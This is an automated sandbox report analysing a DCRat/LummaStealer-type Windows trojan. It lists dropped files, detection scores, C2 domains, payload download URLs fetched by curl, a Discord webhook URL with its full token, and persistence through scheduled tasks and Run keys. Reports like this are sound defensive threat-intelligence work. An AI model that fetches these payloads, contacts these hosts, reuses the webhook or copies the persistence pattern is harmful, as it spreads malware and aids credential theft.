                                C:\Users\user\Desktop\DqsZwsEl.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\UXzpIjDH.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\TUtPMNAm.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\MQUzRRxE.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\GfhqKgmo.log100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\JlazcluE.log100%Joe Sandbox ML
                                C:\Edge\msedge.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\NKJXVMBv.log100%Joe Sandbox ML
                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\EVLpKOHn.log100%Joe Sandbox ML
                                C:\Edge\msedge.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\DqsZwsEl.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\EVLpKOHn.log8%ReversingLabs
                                C:\Users\user\Desktop\GfhqKgmo.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\JlazcluE.log8%ReversingLabs
                                C:\Users\user\Desktop\MQUzRRxE.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\NKJXVMBv.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\NhvHKDkY.log29%ReversingLabs
                                C:\Users\user\Desktop\TUtPMNAm.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\UXzpIjDH.log8%ReversingLabs
                                C:\Users\user\Desktop\VPYFfuwr.log29%ReversingLabs
                                C:\Users\user\Desktop\VltWWbmg.log8%ReversingLabs
                                C:\Users\user\Desktop\WpXNITDI.log29%ReversingLabs
                                C:\Users\user\Desktop\XmyVeTRC.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\eGTFsMJp.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\fZXNGngO.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\iacMOeMk.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\rWRTdVVu.log29%ReversingLabs
                                C:\Users\user\Desktop\uIZJMPyD.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\wDtsBZWh.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\zrKsasrd.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\Speech\kdmapper.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\Speech\physmeme.exe61%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                https://player.vimeo.com0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/0%URL Reputationsafe
                                https://contoso.com/License0%URL Reputationsafe
                                https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                                http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                                https://medal.tv0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                https://nuget.org/nuget.exe0%URL Reputationsafe
                                https://login.steampowered.com/0%URL Reputationsafe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                https://store.steampowered.com/legal/0%URL Reputationsafe
                                https://steam.tv/0%URL Reputationsafe
                                http://nuget.org/NuGet.exe0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                https://recaptcha.net0%URL Reputationsafe
                                https://store.steampowered.com/0%URL Reputationsafe
                                https://lv.queniujq.cn0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
                                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                https://checkout.steampowered.com/0%URL Reputationsafe
                                https://help.steampowered.com/0%URL Reputationsafe
                                https://api.steampowered.com/0%URL Reputationsafe
                                http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
                                https://aka.ms/pscore680%URL Reputationsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                offeviablwke.site
                                104.21.84.213
                                truetrue
                                  unknown
                                  steamcommunity.com
                                  104.102.49.254
                                  truefalse
                                    unknown
                                    file.garden
                                    188.114.96.3
                                    truefalse
                                      unknown
                                      fossillargeiw.shop
                                      unknown
                                      unknowntrue
                                        unknown
                                        strappystyio.shop
                                        unknown
                                        unknowntrue
                                          unknown
                                          tiddymarktwo.shop
                                          unknown
                                          unknowntrue
                                            unknown
                                            coursedonnyre.shop
                                            unknown
                                            unknowntrue
                                              unknown
                                              surveriysiop.shop
                                              unknown
                                              unknowntrue
                                                unknown
                                                captainynfanw.shop
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  tearrybyiwo.shop
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    zelensky.top
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      appleboltelwk.shop
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        tendencerangej.shop
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
                                                          coursedonnyre.shoptrue
                                                            unknown
                                                            https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binfalse
                                                              unknown
                                                              https://offeviablwke.site/apitrue
                                                                unknown
                                                                strappystyio.shoptrue
                                                                  unknown
                                                                  tearrybyiwo.shoptrue
                                                                    unknown
                                                                    https://steamcommunity.com/profiles/76561199724331900true
                                                                    • URL Reputation: malware
                                                                    unknown
                                                                    https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binfalse
                                                                      unknown
                                                                      captainynfanw.shoptrue
                                                                        unknown
                                                                        fossillargeiw.shoptrue
                                                                          unknown
                                                                          tiddymarktwo.shoptrue
                                                                            unknown
                                                                            surveriysiop.shoptrue
                                                                              unknown
                                                                              tendencerangej.shoptrue
                                                                                unknown
                                                                                appleboltelwk.shoptrue
                                                                                  unknown
                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  https://www.google.coRegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://player.vimeo.comRegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://community.akamai.steamstatic.com/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.microsoft.copowershell.exe, 0000001F.00000002.2016540956.000001E66D0F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://contoso.com/Licensepowershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://www.gstatic.cn/recaptcha/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binrccurl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://www.youtube.comRegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aRegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://www.google.comRegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://medal.tvRegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://crl.microsopowershell.exe, 0000001F.00000002.2033274385.000001E66D2E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://zelensky.topwCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://contoso.com/powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO4tXm5yPtiy.exefalse
                                                                                                        unknown
                                                                                                        https://nuget.org/nuget.exepowershell.exe, 0000001E.00000002.1903468013.000001BEF2E4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://auth.gg/4tXm5yPtiy.exefalse
                                                                                                          unknown
                                                                                                          https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binp.Fcurl.exe, 00000004.00000002.1488445675.00000288C36E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://zelensky.top/msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://surveriysiop.shop/api02RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.phpwCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://s.ytimg.com;RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://login.steampowered.com/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1741738289.000001BEE2DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E654E51000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:curl.exe, 00000007.00000002.1504104457.000001FB23F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://store.steampowered.com/legal/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://steam.tv/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://offeviablwke.site/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.houseindustries.com/license4tXm5yPtiy.exefalse
                                                                                                                          unknown
                                                                                                                          http://www.houseindustries.com/licenseBurbank4tXm5yPtiy.exefalse
                                                                                                                            unknown
                                                                                                                            https://www.google.coNRegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000001E.00000002.1903468013.000001BEF2E4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.houseindustries.comhttp://www.talleming.comHouse4tXm5yPtiy.exefalse
                                                                                                                                unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPRegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001E.00000002.1741738289.000001BEE3008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://store.steampowered.com/privacy_agreement/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://contoso.com/Iconpowershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://recaptcha.netRegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://store.steampowered.com/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin:lcurl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://sketchfab.comRegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://tiddymarktwo.shop/api(3RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://lv.queniujq.cnRegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                          • URL Reputation: malware
                                                                                                                                          unknown
                                                                                                                                          https://www.youtube.com/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://127.0.0.1:27060RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:curl.exe, 00000004.00000002.1488445675.00000288C36E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://www.houseindustries.com/licenseCopyright4tXm5yPtiy.exefalse
                                                                                                                                                    unknown
                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTgRegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://coursedonnyre.shop/apiRegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://offeviablwke.site:443/apiRegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001E.00000002.1741738289.000001BEE3008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.google.com/recaptcha/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://checkout.steampowered.com/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://help.steampowered.com/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://api.steampowered.com/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://aka.ms/pscore68powershell.exe, 0000001E.00000002.1741738289.000001BEE2DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E654E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://steamcommunity.com/p3WRegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://strappystyio.shop/apiRegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://steamcommunity.com/RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binM6curl.exe, 00000004.00000002.1488445675.00000288C36F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    188.114.96.3
                                                                                                                                                                    file.gardenEuropean Union
                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                    104.102.49.254
                                                                                                                                                                    steamcommunity.comUnited States
                                                                                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                                                                                    104.21.84.213
                                                                                                                                                                    offeviablwke.siteUnited States
                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                    IP
                                                                                                                                                                    127.0.0.1
                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                    Analysis ID:1522831
                                                                                                                                                                    Start date and time:2024-09-30 18:24:26 +02:00
                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 12m 56s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                    Number of analysed new started processes analysed:66
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Sample name:4tXm5yPtiy.exe
                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                    Original Sample Name:a952acc41933fa2aa78ccc28f45c25928e1ef5c3b72ef3235b99c7bd79e9de40.exe
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.spre.troj.expl.evad.winEXE@85/66@18/4
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 25%
                                                                                                                                                                    HCA Information:Failed
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 1872 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 3848 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 4584 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 4648 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target msedge.exe, PID 6872 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 3532 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6708 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 2940 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 3148 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 3908 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 5652 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target wCnmgKwwXYQbWeNvWeCCOp.exe, PID 6892 because it is empty
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                    • VT rate limit hit for: 4tXm5yPtiy.exe
                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    12:25:32API Interceptor3x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                    12:25:51API Interceptor53x Sleep call for process: powershell.exe modified
                                                                                                                                                                    12:26:02API Interceptor2x Sleep call for process: wCnmgKwwXYQbWeNvWeCCOp.exe modified
                                                                                                                                                                    12:26:12API Interceptor1x Sleep call for process: msedge.exe modified
                                                                                                                                                                    18:25:48Task SchedulerRun new task: wCnmgKwwXYQbWeNvWeCCOp path: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                                                                                                                                                    18:25:48Task SchedulerRun new task: wCnmgKwwXYQbWeNvWeCCOpw path: "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                                                                                                                                                    18:25:50Task SchedulerRun new task: msedge path: "C:\Edge\msedge.exe"
                                                                                                                                                                    18:25:50Task SchedulerRun new task: msedgem path: "C:\Edge\msedge.exe"
                                                                                                                                                                    18:25:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOp "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                                                                                                                                                    18:26:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                                    18:26:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOp "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                                                                                                                                                    18:26:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                                    18:26:26AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wCnmgKwwXYQbWeNvWeCCOp "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
